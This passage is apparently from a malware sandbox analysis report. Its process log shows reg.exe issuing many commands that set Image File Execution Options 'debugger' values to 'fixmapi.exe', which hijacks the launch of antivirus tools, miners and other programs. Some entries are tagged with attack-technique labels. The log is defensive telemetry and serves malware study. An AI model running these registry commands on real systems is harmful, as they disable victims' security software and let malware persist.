    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\snmptrap.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minergate.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EthDcrMiner64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CisTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:880
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ToolbarUpdaterService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PanGPA.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PanGPS.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hale.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NsCpuapl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdguardSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdguardSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adguard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BusinessMessaging.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3260
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3306.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:612
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svnhost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemsmss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdcsc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIVIR▄.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\player.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:808
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\swdoctor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:412
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sdhelp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uistub.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\klvk.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3364
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HpSrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3184
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NiceHashMiner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpuminer_x64_SSE2.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\skying.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a1g.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4528
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHActiveDefense.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHWatchdog.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:924
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2start.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Miner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:904
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mark.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wwmeeg.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Spred.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinApp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Hkufhbj.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winup.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mrolsmc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhostgui.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Search.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mms.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4324
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aawservice.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WRSA.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1456
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gy.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.com" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windrvs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwmr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4396
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SFAUpdater.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:5104
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe(1)" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updata.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rvlkl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4720
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sessmgr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ingloca.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3SP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vcsvcc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vcsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlock.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Vip Slow.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchos.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systms.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rutserv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1384
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LoadStat.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QuikProtect.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QpMonitor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msbtce.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smBootTime.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UninstallMonitor.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nsbu.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauclm.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systrays.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchobst.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetGoodBar.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2676
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1364
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\THGuard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DTLEP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sgbider.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:776
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wiswqcs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Zpgiupy.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hmac.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ytbrowser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ytpumpchrome.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\StSess.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Lite.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAUI.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeaTimer.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\igateway.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:452
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoRPC.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoRT.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InoTask.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Realmon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securesurf.browser.client.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFSSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dmhelpserver.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webisida.browser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4300
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDWSCSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDUpdSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MBAMService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4880
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbarw.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSafeTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDUpdate.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:924
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPK.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5084
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpkL64.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Project1.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:116
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchots.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svcohst.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
